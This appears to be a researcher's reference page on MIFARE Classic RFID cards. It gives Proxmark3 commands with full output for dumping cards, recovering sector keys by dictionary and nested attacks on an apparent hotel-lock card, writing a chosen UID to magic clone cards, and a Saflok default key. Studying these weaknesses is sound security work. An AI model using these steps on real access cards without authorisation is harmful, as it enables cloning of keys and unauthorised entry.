MIFARE Classic - Documentation

Link to this headingMIFARE Classic

Uses the ISO/IEC 14443-3 protocol
Operates at 13.56 MHz
1K or 4K EEPROM
- Uses a key to write and a separate key to read the datablock

Unsaflok is a series of serious security vulnerabilities in dormakaba’s Saflok electronic RFID locks, commonly used in hotels and multi-family housing environments.

Documentation:

RF Documentation

Link to this headingCRYPTO1 Cipher

CRYPTO1 cipher is a 48-bit linear feedback shift register

Polynomial: x^48 + x^43 + x^39 + x^38 + x^36 + x^34 + x^33 + x^31 + x^29 + x^24 + x^23 + x^21 + x^19 + x^13 + x^9 + x^7 + x^6 + x^5 + 1

Link to this headingMifare Classic EV1

48bit Crypto-1
ECC signature

Link to this headingProxmark Commands

Read Card:

[usb] pm3 --> hf mf info [=] --- ISO14443-a Information --------------------- [+] UID: 6D 5D 03 B2 [+] ATQA: 00 04 [+] SAK: 08 [2] [=] --- Keys Information [=] [0] key FF FF FF FF FF FF [+] loaded 1 keys supplied by user [+] loaded 59 keys from hardcoded default array [+] Sector 0 key A... FFFFFFFFFFFF [+] Sector 0 key B... FFFFFFFFFFFF [+] Block 0.......... 6D 5D 03 B2 81 08 04 00 62 63 64 65 66 67 68 69 [+] Fudan tag detected [=] --- Magic Tag Information [=] <N/A> [=] --- PRNG Information [#] Static nonce......... 01200145 [+] Static nonce......... yes

Dump and View:

[usb] pm3 --> hf mf dump [=] Using... hf-mf-6C2337D5-key.bin [=] Reading sector access bits... [=] ................. [+] Finished reading sector access bits [=] Dumping all blocks from card... [/]successfully read block 3 of sector 15 [+] Succeeded in dumping all blocks [+] time: 10 seconds [...] [usb] pm3 --> hf mf view --file hf-mf-6C2337D5-dump-001.bin [+] loaded 1024 bytes from binary file `hf-mf-6C2337D5-dump-001.bin` [=] -----+-----+-------------------------------------------------+----------------- [=] sec | blk | data | ascii [=] -----+-----+-------------------------------------------------+----------------- [=] 0 | 0 | 6C 23 37 D5 AD 08 04 00 03 71 31 F3 60 0A 46 1D | l#7......q1.`.F. [=] | 1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 3 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 1 | 4 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 5 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 6 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 7 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 2 | 8 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 9 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 11 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 3 | 12 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 13 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 14 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 15 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 4 | 16 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 17 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 18 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 19 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 5 | 20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 21 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 22 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 23 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 6 | 24 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 25 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 26 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 27 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 7 | 28 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 29 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 31 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 8 | 32 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 35 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 9 | 36 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 39 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 10 | 40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 41 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 42 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 43 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 11 | 44 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 45 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 46 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 47 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 12 | 48 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 49 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 51 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 13 | 52 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 53 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 54 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 55 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 14 | 56 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 57 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 58 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 59 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] 15 | 60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 61 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 62 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [=] | 63 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i...... [=] -----+-----+-------------------------------------------------+----------------- [?] cyan = value block with decoded value

Mifare Application Data:

[usb] pm3 --> hf mf mad [=] Authentication ( ok ) [#] Auth error [=] --- MIFARE App Directory Information ---------------- [=] ----------------------------------------------------- [=] ------------ MAD v1 details ------------- [+] Card publisher sector 0x01 [=] ---------------- Listing ---------------- [=] 00 MAD v1 [=] 01 [7006] Hotel, access contr. & sec [Vingcard a.s.] [=] 02 [7005] Energy Saving System For Hotels, Access Control [ENKOA System] [=] 03 [7007] Hotel, access contr. & sec [Vingcard a.s.] [=] 04 [7007] continuation [=] 05 [7007] continuation [=] 06 [7009] Access control data for electronic locks [Timelox AB] [=] 07 [0000] free [=] 08 [0000] free [=] 09 [0000] free [=] 10 [0000] free [=] 11 [0000] free [=] 12 [0000] free [=] 13 [0000] free [=] 14 [0000] free [=] 15 [0000] free

Key Search:

[usb] pm3 --> hf mf fchk -f mfc_default_keys [+] loaded 59 keys from hardcoded default array [+] loaded 1726 keys from dictionary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\dictionaries/mfc_default_keys.dic [=] Running strategy 1 [=] . [=] Running strategy 2 [=] . [=] time in checkkeys (fast) 47.1s [+] found keys: [+] -----+-----+--------------+---+--------------+---- [+] Sec | Blk | key A |res| key B |res [+] -----+-----+--------------+---+--------------+---- [+] 000 | 003 | A0A1A2A3A4A5 | 1 | B578F38A5C61 | 1 [+] 001 | 007 | ------------ | 0 | ------------ | 0 [+] 002 | 011 | A0A1A2A3A4A5 | 1 | 0000014B5C31 | 1 [+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 006 | 027 | FFFFFFFFFFFF | 1 | ------------ | 0 [+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1 [+] -----+-----+--------------+---+--------------+---- [+] ( 0:Failed / 1:Success ) [?] MAD key detected. Try `hf mf mad` for more details

Auto Dump Keys and Data:

[usb] pm3 --> hf mf autopwn -f mfc_default_keys [!] no known key was supplied, key recovery might fail [+] loaded 59 keys from hardcoded default array [+] loaded 1726 keys from dictionary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\dictionaries/mfc_default_keys.dic [=] running strategy 1 [=] . [=] running strategy 2 [=] . [+] target sector 0 key type A -- found valid key [ A0A1A2A3A4A5 ] (used for nested / hardnested attack) [+] target sector 0 key type B -- found valid key [ B578F38A5C61 ] [+] target sector 2 key type A -- found valid key [ A0A1A2A3A4A5 ] [+] target sector 2 key type B -- found valid key [ 0000014B5C31 ] [+] target sector 3 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 3 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 4 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 4 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 5 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 5 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 6 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 7 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 7 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 8 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 8 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 9 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 9 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 10 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 10 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 11 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 11 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 12 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 12 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 13 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 13 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 14 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 14 key type B -- found valid key [ FFFFFFFFFFFF ] [+] target sector 15 key type A -- found valid key [ FFFFFFFFFFFF ] [+] target sector 15 key type B -- found valid key [ FFFFFFFFFFFF ] [+] Found 1 key candidates [+] Target block 4 key type A -- found valid key [ D0020E22BA10 ] [+] target sector 1 key type A -- found valid key [ D0020E22BA10 ] [+] Found 1 key candidates [+] Target block 4 key type B -- found valid key [ 10083AEC46B0 ] [+] target sector 1 key type B -- found valid key [ 10083AEC46B0 ] [+] Found 1 key candidates [+] Target block 24 key type B -- found valid key [ 94E6E9E0F498 ] [+] target sector 6 key type B -- found valid key [ 94E6E9E0F498 ] [+] found keys: [+] -----+-----+--------------+---+--------------+---- [+] Sec | Blk | key A |res| key B |res [+] -----+-----+--------------+---+--------------+---- [+] 000 | 003 | A0A1A2A3A4A5 | D | B578F38A5C61 | D [+] 001 | 007 | D0020E22BA10 | N | 10083AEC46B0 | N [+] 002 | 011 | A0A1A2A3A4A5 | D | 0000014B5C31 | D [+] 003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 005 | 023 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 006 | 027 | FFFFFFFFFFFF | D | 94E6E9E0F498 | N [+] 007 | 031 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 008 | 035 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 009 | 039 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 010 | 043 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 011 | 047 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 012 | 051 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 013 | 055 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 014 | 059 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] 015 | 063 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D [+] -----+-----+--------------+---+--------------+---- [=] ( D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA ) [?] MAD key detected. Try `hf mf mad` for more details [+] Generating binary key file [+] Found keys have been dumped to D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mf-306EDAAE-key.bin [=] --[ FFFFFFFFFFFF ]-- has been inserted for unknown keys where res is 0 [=] transferring keys to simulator memory ( ok ) [=] dumping card content to emulator memory (Cmd Error: 04 can occur) [#] Block 8 Cmd 0x30 Cmd Error 04 [#] Error No rights reading sector 2 block 0 [#] Block 9 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 9 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 10 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 10 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 11 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 11 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 24 Cmd 0x30 Cmd Error 04 [#] Error No rights reading sector 6 block 0 [#] Block 25 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 25 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 26 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 26 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 27 Cmd 0x30 Wrong response len, expected 18 got 0 [#] Block 27 Cmd 0x30 Wrong response len, expected 18 got 0 [-] fast dump reported back failure w KEY A, swapping to KEY B [=] downloading card content from emulator memory [+] saved 1024 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mf-306EDAAE-dump.bin [+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mf-306EDAAE-dump.json [=] autopwn execution time: 52 seconds

[usb] pm3 --> hf mf nack [=] Checking for NACK bug [=] ... [+] NACK test: always leak NACK

Link to this headingMagic Card 7b UID

Change Block 0:

[usb] pm3 --> hf mf rdbl --blk 0 [=] # | sector 00 / 0x00 | ascii [=] ----+-------------------------------------------------+----------------- [=] 0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [usb] pm3 --> hf mf wrbl --blk 0 -d 000102030405060708090a0b0c0d0e0f --force [=] Writing block no 0, key A - FFFFFFFFFFFF [=] data: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F [+] Write ( ok ) [?] try `hf mf rdbl` to verify [usb] pm3 --> hf mf rdbl --blk 0 [=] # | sector 00 / 0x00 | ascii [=] ----+-------------------------------------------------+----------------- [=] 0 | 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F | ................ [usb] pm3 --> hf mf info [=] --- ISO14443-a Information --------------------- [+] UID: 00 01 02 03 04 05 06 [+] ATQA: 00 42 [+] SAK: 18 [2] [=] --- Keys Information [=] [0] key FF FF FF FF FF FF [+] loaded 1 keys supplied by user [+] loaded 59 keys from hardcoded default array [+] Sector 0 key A... FFFFFFFFFFFF [+] Sector 0 key B... FFFFFFFFFFFF [+] Block 0.......... 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F [=] --- Magic Tag Information [+] Magic capabilities... Gen 2 / CUID [=] --- PRNG Information [#] Static nonce......... 00000000 [+] Static nonce......... yes

Link to this headingMagic Card 7b UID

Change Block 0:

[usb] pm3 --> hf mf rdbl --blk 0 [=] # | sector 00 / 0x00 | ascii [=] ----+-------------------------------------------------+----------------- [=] 0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ [usb] pm3 --> hf mf wrbl --blk 0 -d 000102030405060708090a0b0c0d0e0f --force [=] Writing block no 0, key A - FFFFFFFFFFFF [=] data: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F [+] Write ( ok ) [?] try `hf mf rdbl` to verify [usb] pm3 --> hf mf rdbl --blk 0 [=] # | sector 00 / 0x00 | ascii [=] ----+-------------------------------------------------+----------------- [=] 0 | 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F | ................ [usb] pm3 --> hf mf info [=] --- ISO14443-a Information --------------------- [+] UID: 00 01 02 03 [+] ATQA: 00 02 [+] SAK: 18 [2] [=] --- Keys Information [=] [0] key FF FF FF FF FF FF [+] loaded 1 keys supplied by user [+] loaded 59 keys from hardcoded default array [+] Sector 0 key A... FFFFFFFFFFFF [+] Sector 0 key B... FFFFFFFFFFFF [+] Block 0.......... 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F [=] --- Magic Tag Information [+] Magic capabilities... Gen 2 / CUID [=] --- PRNG Information [+] Prng................. weak

Link to this headingMagic Gen4 Card

How to remove the write protections on Gen4 Cards:

#Get Magic config info hf mf gdmcfg #turn Magic Wakeup on... hf mf gdmsetcfg -d 7AFF00000000000000005A5A00000008 #turn Magic Wakeup off... hf mf gdmsetcfg -d 850000000000000000005A5A00000008

Link to this headingSaflok Card

Uses a default key of 0x2a2c13cc242a in key_id[1].
Source

KDF Verification